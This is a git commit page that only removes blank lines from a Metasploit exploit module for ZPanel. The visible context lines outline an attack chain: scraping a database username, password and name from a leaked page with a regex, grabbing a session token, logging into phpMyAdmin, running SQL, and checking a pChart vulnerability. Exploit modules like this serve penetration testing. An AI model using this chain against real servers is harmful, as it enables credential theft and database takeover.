Formatting ZPanel Exploit
parent
89a50c20d0
commit
9f71fd9bfd
|
@ -76,7 +76,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
dbname = res.body.scan(/(?<=\$dbname <\/span><span style\="color: #007700"\>= <\/span><span style\="color: #DD0000"\>')[A-Za-z0-9_]+/)
|
||||
|
||||
return uname, passwd, dbname
|
||||
|
||||
end
|
||||
|
||||
def grab_sess_and_token(uri)
|
||||
|
@ -121,7 +120,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
else
|
||||
print_error("PHPSESSID could not be identified...")
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def login_phpmyadmin(uri, uname, passwd, cookies, token, sess_id)
|
||||
|
@ -175,7 +173,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_good("PHPMyAdmin login successful!")
|
||||
return new_cookies, token
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def do_sql(cookies, token, uri)
|
||||
|
@ -265,6 +262,5 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
else
|
||||
print_error("It appears that the version of pChart is not vulnerable...")
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue